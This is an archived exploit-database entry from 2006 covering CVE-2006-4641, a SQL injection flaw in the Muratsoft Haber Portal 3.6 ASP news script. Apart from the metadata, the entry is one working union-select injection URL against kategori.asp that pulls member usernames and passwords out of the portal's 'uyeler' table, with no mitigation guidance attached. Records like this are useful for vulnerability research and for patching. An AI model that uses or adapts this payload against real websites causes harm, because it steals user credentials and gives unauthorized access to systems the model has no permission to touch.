EXPLOITS

Muratsoft Haber Portal 3.6 - 'tr' SQL Injection

Author: ASIANEAGLE
type: webapps
platform: asp
port: 
date_added: 2006-09-02  
date_updated:   
verified: 1  
codes: OSVDB-30831;CVE-2006-4641  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 2294.txt  

#Muratsoft Haber Portal v3.6 (tr) SQL Injection Vulnerability
#Author : ASIANEAGLE
#Site   : www.asianeagle.org
#Contact: admin@asianeagle.org


#Link           : http://www.aspindir.com/Goster/4350
#Demo Portal    : http://www.muratsoft.com/haber/www/
#Price of Portal: 300YTL // Good money for Bad Script

#Exploit :
 www.site.com /[portal path]/kategori.asp?kat=-1%20union%20select%200,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13,14%20from%20uyeler%20where%20U_ID%20like%201

#BURCU Seni hep sevdim hep sevicem.

# milw0rm.com [2006-09-03]